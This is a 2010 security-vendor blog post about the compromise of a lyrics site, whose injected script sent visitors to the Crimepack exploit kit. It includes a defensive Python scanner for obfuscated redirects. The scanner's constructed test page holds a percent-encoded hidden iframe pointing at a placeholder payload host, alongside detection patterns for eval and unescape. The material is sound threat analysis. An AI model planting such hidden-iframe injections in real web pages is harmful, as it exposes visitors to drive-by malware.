
Singing a malicious song
Posted: 16 Sep 2010 04:23 PM


Every now and then we look for song lyrics on the Internet. Using the newest Google Instant technology we immediately find what we need. At least, we think so.

 

Websense Security Labs™ ThreatSeeker™ Network has detected that the popular site Songlyrics.com (with approximately 200,000 daily page views and 2,000,000 unique visitors) is compromised and injected with obfuscated malicious code.
Websense customers are proactively protected against the malicious code by our Advanced Classification Engine (ACE).

 

Once a user accesses the main page of the song lyrics site, the injected code redirects the browser to an exploit site hosting the Crimepack exploit kit.
A successful exploit drops a malicious binary (VT 39.5%) that is run on the victim's computer. Once infected, the machine becomes another zombie bot in the wild.


Deobfuscating this code reveals a redirection to the malicious payload site:


It is interesting to note that the malicious code injected on Songlyrics.com uses an obfuscation algorithm similar to the one used by Crimepack itself, a prepackaged commercial kit used by attackers to deliver malicious Web-based code.

It appears that the majority of pages served by Songlyrics.com are compromised.

Crimepack has become one of the best-selling exploit packs on the market because its large number of pre-compiled exploits offers a ready-made base for the "drive-by download and execute" business model.
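The analysis described above (pull the injected script block, recognise its obfuscation, decode it to expose the redirect to the payload site) can be automated as a first-pass static check. The scanner below is an added example written for this page, not Websense tooling and not the real injected snippet: the sample page, the `payload-site.example` host and the `document.write(unescape(...))` wrapper are all constructed. It never executes the JavaScript; it only scores the indicators an analyst looks for and statically unwraps the two most common encoding idioms, `unescape("%..")` and `String.fromCharCode(..)`, so that a hidden iframe or location change becomes visible.

```python
"""
Static scanner for injected, obfuscated <script> blocks that hide a redirect
to an exploit-kit landing page. Added example for this page; it is not
Websense code and does not reproduce the real Songlyrics.com injection.
It never runs JavaScript: it only decodes unescape()/String.fromCharCode()
wrappers textually and scores what comes out.
"""
import math
import re
from urllib.parse import quote, unquote

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]((?:%[0-9A-Fa-f]{2}|[^'\"])*)['\"]\s*\)")
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
# Things a decoded block does when it is a drive-by redirector.
REDIRECT_RE = re.compile(r"(<iframe\b[^>]*\bsrc=|location(?:\.href)?\s*=|window\.open\()", re.I)

# Indicators an analyst looks for in an injected block; each adds to the score.
INDICATORS = {
    "eval(": 2,
    "unescape(": 2,
    "String.fromCharCode(": 2,
    "document.write(": 1,
}


def shannon_entropy(s: str) -> float:
    """Bits per character; long packed blobs score well above ordinary JS."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def static_decode(js: str, rounds: int = 3) -> str:
    """Peel unescape()/fromCharCode() wrappers without executing anything.
    Several rounds handle one wrapper nested inside another. Note that
    urllib's unquote does not handle JavaScript's %uXXXX form."""
    for _ in range(rounds):
        before = js
        js = UNESCAPE_RE.sub(lambda m: unquote(m.group(1)), js)
        js = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()),
            js,
        )
        if js == before:
            break
    return js


def scan_html(html: str, threshold: int = 4) -> list:
    """Return one finding per <script> block whose score reaches the threshold."""
    findings = []
    for i, m in enumerate(SCRIPT_RE.finditer(html)):
        body = m.group(1)
        score = sum(w for needle, w in INDICATORS.items() if needle in body)
        # A long, high-entropy block is typical of packed or injected code.
        if len(body) > 200 and shannon_entropy(body) > 5.0:
            score += 2
        decoded = static_decode(body)
        redirect = REDIRECT_RE.search(decoded)
        if redirect:
            score += 3
        if score >= threshold:
            findings.append({
                "index": i,
                "score": score,
                "redirect": bool(redirect),
                "decoded": decoded,
            })
    return findings


# Constructed sample page: a hidden iframe pointing at a placeholder host,
# percent-encoded and wrapped the way many injections of this era were.
HIDDEN = '<iframe src="http://payload-site.example/in.php" width="1" height="1"></iframe>'
ENCODED = quote(HIDDEN, safe="")
SAMPLE_HTML = (
    "<html><body><h1>Lyrics</h1>\n"
    '<script>document.write(unescape("' + ENCODED + '"));</script>\n'
    "<script>var page = 1;</script>\n"
    "</body></html>"
)

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"script #{f['index']} score={f['score']} redirect={f['redirect']}")
        print("  decoded:", f["decoded"])
```

The decoder only unwraps the two idioms named above; real kits add further layers (arithmetic on character codes, split and reassembled strings, keys pulled from the page), so a high score is a reason to pull the block into a sandbox or a proper JavaScript deobfuscator, not a verdict on its own. The benign second script on the sample page produces no finding, which is the false-positive check worth keeping when the thresholds are tuned.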



Ivan Sabo

Comments

  Andres Valencia said on Thursday, September 16, 2010 2:47 PM

Thanks!

After a Google search for "Song Lyrics", my AVG Anti-Virus Free Edition did not warn me about the infection at www.songlyrics.com

  Mike Barwise said on Friday, September 17, 2010 2:54 AM

It would be interesting to know how the malicious payload site delivers the bot binary to the victim.

  Ivan Sabo said on Monday, September 20, 2010 3:09 AM

@Mike Barwise

The Crimepack has a huge collection of exploits. Once the visitor accesses the site, known vulnerabilities based on the browser are tested and the first one found used to deliver and quietly install the malicious binary on the victim's computer.

[!v@n]

Websense Security Labs

  Ivan Sabo said on Monday, September 20, 2010 3:10 AM

@Andres Valencia

Unfortunately, AV software usually has no capability to detect such threats. AV engines are designed by default to deal with files already downloaded to the computer and have almost no ability to detect a data flow. Unless you have another level of protection, you rely on the AV's coverage, which can often be too late - the file has already been downloaded and saved on your computer.

Thanks

[!v@n]

Websense Security Labs




©2013 Websense, Inc. All Rights Reserved.